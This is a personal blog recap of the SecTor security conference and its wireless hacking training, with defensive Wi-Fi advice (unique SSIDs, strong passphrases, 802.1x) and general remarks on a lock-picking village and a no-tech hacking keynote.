Well I spent three days this week attending the SecTor pre-con training on Wireless Hacking and SecTor itself and it was worth every minute! The group behind SecTor put on a great event (I should note I was on the advisory committee) with world class speakers from around the world. I thought I’d provide a quick recap along with some links to help you keep up with the ever changing face of IT security.
Wireless Hacking with Dino Covotsos was without a doubt the most interesting training experience I have attended in a long time. First off I haven’t spent an entire day using Linux in a while and the total hands on approach Dino and his co-instructor Charlie used really allowed the entire class to test out WEP and WPA/WPA2 cracking techniques as well as steps to mitigate them. It was also very nice to have Edmonton’s very own Brad RenderMan Haines on hand to share his vast insight into wireless security. While, like you, I had read that WEP was insecure and have not used it in a few years I didn’t realize the tools available to crack WEP in minutes. Actually testing it out on a demo wireless access point really drives home the point. I didn’t realize that the same was also true for WPA/WPA2 access points. While those are a little more difficult (I did get in after about 20 minutes) they are easy to exploit but do offer some mitigation. So what did I walk away with?
- MAC Address Filtering is ineffective on its own as there are tools to change a MAC with one command
- Not broadcasting your SSID is also ineffective because the traffic can still be “seen” with wireless sniffers and the SSID can be found within those packets
- Change your SSID. In order to crack WPA/WPA2 one must compute a rainbow table for each specific SSID. These tables are available to download online for the most popular SSIDs (Linksys, default, SMC, Home and another 997 common SSIDs) Using something unique will require the attacker to generate their own set of tables which will take a long time.
- Cycle your SSID. In the last point I mentioned it would take a long time but not forever 🙂
- Use a complex WPA/WPA2 key! Follow the same principles as you would for a secure domain admin password. 16 characters, mix of upper/lowercase, numbers and special characters and throw in a space or two. Passphrases are better than passwords!
- Even though I stated MAC filtering and hidden SSIDs are ineffective, when combined with other security techniques they do add layers to your security model.
- If you can use authentication on your WiFi networks. 802.1x with certificates or RADIUS both work well.
At the actual event itself the most popular area had to be the Lock Picking Village hosted by Deviant Ollam. Again seeing someone pick a lock on TV or in a movie looks pretty simple, what you might not realize is that in most cases it is even simpler. Lock bumps, wafer keys, Bic pens and beer cans are all very common and can get a large majority of locks open in seconds. It didn’t take much for me to pick up the tools and give it a try opening most locks from your basic combination lock, to bike locks to deadbolts in seconds. Deviant’s Kahlua and milk powered session really made you think about physical security. I urge you to look at the content on his page and re-assess the physical security in your building.
It wasn’t all technical though as Johnny Long was back, this time delivering a keynote titled No Tech Hacking based on his new book. Johnny was a very entertaining and enlightening speaker who makes you look at the people, places and things around you in a very different way. His swag was the most popular at the event as well by selling out long before anything else did, most likely due to the fact that 100% of the money went to his group call http://ihackcharities.org/
As I drove home on Wednesday night after the event all I could think about was October 5-7 2009 as I am already looking forward to SecTor 2009!